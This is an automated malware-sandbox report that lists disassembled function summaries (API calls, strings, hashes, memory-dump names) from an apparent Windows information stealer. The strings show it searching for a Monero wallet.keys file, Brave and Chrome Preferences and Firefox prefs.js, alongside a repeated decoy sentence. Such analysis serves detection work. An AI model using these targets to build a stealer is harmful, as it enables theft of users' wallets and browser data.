Function 003A45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 003A460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003A479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A46B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A46C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A45C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A46D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A45E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A45F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A46CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A45D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A45DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A4678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A46AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003A474F

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 2020e7c3e197797c264958ccbe91e5db7f6f812370a7efd2f36581f8bc6e008d
Instruction ID: c77f1c1024f1282910aec995185ef118820ddab98e2cd0b5a92c6156bb2dfe33
Opcode Fuzzy Hash: 2020e7c3e197797c264958ccbe91e5db7f6f812370a7efd2f36581f8bc6e008d
Instruction Fuzzy Hash: 8641E760ECB6086AF726BBE48C42FDD76556F42FC8F507068EA2192283CFB079404B75

Function 003ABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

FindFirstFileA.KERNEL32(00000000,?,003C0B32,003C0B2B,00000000,?,?,?,003C13F4,003C0B2A), ref: 003ABEF5
StrCmpCA.SHLWAPI(?,003C13F8), ref: 003ABF4D
StrCmpCA.SHLWAPI(?,003C13FC), ref: 003ABF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 003AC7BF
FindClose.KERNEL32(000000FF), ref: 003AC7D1

Strings

Brave, xrefs: 003AC102
Google Chrome, xrefs: 003AC634
\Brave\Preferences, xrefs: 003AC1DB
Preferences, xrefs: 003AC11E

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: a89206e05060276ca2ae649dbdb782a038d0c1cbbdd9f8f48f2e5f364bf86ba9
Instruction ID: 3f9e5a094a871875ff5d145bbca28a5ea65f5e4ce8d6ac9dd940aa7f07df28bc
Opcode Fuzzy Hash: a89206e05060276ca2ae649dbdb782a038d0c1cbbdd9f8f48f2e5f364bf86ba9
Instruction Fuzzy Hash: F9428772910508ABDB16FBB0DC96EED737CAF94304F404558F6069A481EF34AF49DBA2

Function 6CC935A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6CD1F688,00001000), ref: 6CC935D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC935E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6CC935FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC9363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC9369F
__aulldiv.LIBCMT ref: 6CC936E4
QueryPerformanceCounter.KERNEL32(?), ref: 6CC93773
EnterCriticalSection.KERNEL32(6CD1F688), ref: 6CC9377E
LeaveCriticalSection.KERNEL32(6CD1F688), ref: 6CC937BD
QueryPerformanceCounter.KERNEL32(?), ref: 6CC937C4
EnterCriticalSection.KERNEL32(6CD1F688), ref: 6CC937CB
LeaveCriticalSection.KERNEL32(6CD1F688), ref: 6CC93801
__aulldiv.LIBCMT ref: 6CC93883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CC93902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CC93918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CC9394C

Strings

AuthcAMDenti, xrefs: 6CC93946
MOZ_TIMESTAMP_MODE, xrefs: 6CC935DB
GTC, xrefs: 6CC93912
QPC, xrefs: 6CC938FC
GenuntelineI, xrefs: 6CC93639

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: f6a364dea2e1b1404bf3908ceabfd45674db1f08ee5a6d5b4e2394110bbb5baf
Instruction ID: 27394cb4b94ab0df42de5d470a69e981453a1c12c8ea64e8f52263ded7200670
Opcode Fuzzy Hash: f6a364dea2e1b1404bf3908ceabfd45674db1f08ee5a6d5b4e2394110bbb5baf
Instruction Fuzzy Hash: 0AB1B6B1B083109FEB08DF28D45661A77F9BB89704F09892EE599D3F90E770D806CB91

Function 003B4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 003B492C
FindFirstFileA.KERNEL32(?,?), ref: 003B4943
StrCmpCA.SHLWAPI(?,003C0FDC), ref: 003B4971
StrCmpCA.SHLWAPI(?,003C0FE0), ref: 003B4987
FindNextFileA.KERNEL32(000000FF,?), ref: 003B4B7D
FindClose.KERNEL32(000000FF), ref: 003B4B92

Strings

%s\*, xrefs: 003B4920
%s\%s, xrefs: 003B49FB
%s\%s, xrefs: 003B49A4

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 6c32bbd8327f09d67fd4d9fb482766a4ea2cafb5b5be6c8b715dfdbe6d81fea2
Instruction ID: 34d8d8446b5162723772267297b990ea2f2e4772b2d554c04722d6eb6a80b878
Opcode Fuzzy Hash: 6c32bbd8327f09d67fd4d9fb482766a4ea2cafb5b5be6c8b715dfdbe6d81fea2
Instruction Fuzzy Hash: 3A615672900258ABCB25EBB0DC85FEA737CFB59700F04458CF64996141EB71AB89CF91

Function 003B3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 003B3EC3
FindFirstFileA.KERNEL32(?,?), ref: 003B3EDA
StrCmpCA.SHLWAPI(?,003C0FAC), ref: 003B3F08
StrCmpCA.SHLWAPI(?,003C0FB0), ref: 003B3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 003B406C
FindClose.KERNEL32(000000FF), ref: 003B4081

Strings

%s\%s, xrefs: 003B3EB7

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 09bc4dbb484379ceb9a0bc9d40f45d7ae8023cd008595d46ec4c4a8136c5aafa
Instruction ID: 639338269e5399ab4937a321ed159d546ead7f768fa1e69a7e42092619d0ded9
Opcode Fuzzy Hash: 09bc4dbb484379ceb9a0bc9d40f45d7ae8023cd008595d46ec4c4a8136c5aafa
Instruction Fuzzy Hash: 055157B6904218ABCB29EBB0DC85EEA737CBB54704F00458CF7599A040EB75EB89CF51

Function 003AF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003C15B8,003C0D96), ref: 003AF71E
StrCmpCA.SHLWAPI(?,003C15BC), ref: 003AF76F
StrCmpCA.SHLWAPI(?,003C15C0), ref: 003AF785
FindNextFileA.KERNELBASE(000000FF,?), ref: 003AFAB1
FindClose.KERNEL32(000000FF), ref: 003AFAC3

Strings

prefs.js, xrefs: 003AF812

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
